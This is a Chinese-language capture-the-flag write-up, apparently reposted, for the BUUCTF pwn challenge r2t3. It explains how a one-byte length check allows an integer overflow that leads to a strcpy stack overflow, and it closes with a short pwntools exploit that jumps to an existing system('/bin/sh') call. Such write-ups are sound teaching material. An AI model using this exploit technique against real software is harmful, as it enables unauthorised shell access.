[BUUCTF-pwn]——[BJDCTF 2nd]r2t3

• 題目地址：https://buuoj.cn/challenges#[BJDCTF%202nd]r2t3
• 題目：
  
  先將文件下載下來，checksec一下。32位僅僅開啟了NX保護。
  在IDA中看看。有read函數但是長度限制導致無法棧溢出,點開下面一個函數看看.
  
  里面有個strcpy函數,可以將其拷貝到dest里面. 并且0x11 + 0x4 + 0x4 << 0x400. 完美可以利用.但是字符串長度只能是 4~7. 上面v3是int8其實是一個字節. 我們可以利用最簡單的整數溢出,來做 0x100 對應 0 。那么 0x104對應就是4,0x107對應就是7。
  
  再看看其他函數,竟然發現了system("/bin/sh")。看來這個題目主要考驗的就是整數溢出和棧溢出了
  
  

exploit

from pwn import * p=remote('node3.buuoj.cn',xxxx) sys_addr = 0x08048594 #我比較喜歡壓參數的位置.因為即使調用的函數有驗證也可以繞過去. p.recvuntil("name:") payload=(0x11+0x4)*'a'+p32(sys_addr) payload=payload.ljust(0x105,'a') p.sendline(payload) p.interactive()

總結

以上是生活随笔為你收集整理的[BUUCTF-pwn]——[BJDCTF 2nd]r2t3的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。